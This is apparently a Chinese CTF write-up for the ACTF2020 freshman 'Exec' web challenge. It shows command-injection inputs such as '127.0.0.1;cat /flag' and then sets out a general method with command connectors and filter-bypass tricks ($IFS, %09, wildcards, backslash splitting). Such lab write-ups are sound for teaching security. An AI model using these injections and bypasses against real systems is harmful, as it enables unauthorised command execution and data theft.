ARTICLE DETAIL

资讯详情

深耕网站SEO优化与搜索引擎排名提升的一线实战洞察。

【WP】ctf-web-[ACTF2020 新生赛]Exec

【WP】ctf-web-[ACTF2020 新生赛]Exec 命令执行漏洞解题输入127.0.0.1测试功能确认页面有回显命令拼接验证注入点输入127.0.0.1;ls原理利用分号结束前一个命令开始执行新命令ls结果只看到了index.php打开之后没有有效信息说明命令执行成功但是当前目录下没有flag当前目录没有就去根目录127.0.0.1ls /结果发现根目录下有flag文件读取flag127.0.0.1;cat /flag知识点命令执行漏洞通用解题思路”四步走“1. 判断连接符符号含义适用场景;连续执行Linux/Windows 通用最常用前面成功才执行后面Linux/Windows|管道符把前面的输出给后面Linux/Windows%0aURL 编码的换行符某些过滤了特殊字符的场景2. 列出文件看有什么只要命令能执行第一件事就是看文件Linux:ls,ls -la(看隐藏文件),ls /(看根目录),dir(Windows)找 Flag 常见位置:当前目录、根目录/、/tmp、/home、/var/www/html3. 读取内容常用命令cat, more, less, head, tail, nl (带行号显示)4.如果没反应则是过滤了关键词需要绕过过滤绕过空格$IFS(Linux 内部变量最常用) -cat$IFSflag.txt%09(Tab 键的 URL 编码) -cat%09flag.txt{}(花括号) -cat{flag.txt}绕过关键字比如禁用了cat拼接法cat flag.txt或ca\t flag.txt通配符c* flag.txt替代命令用more,less,head代替cat。绕过黑名单比如禁用了flag通配符cat fl*或cat f???(?代表任意一个字符)如何判断操作系统whoamilinuxwww-data、root、apache、nginxwindowsnt authority\system、administrator、iis apppool\...
返回列表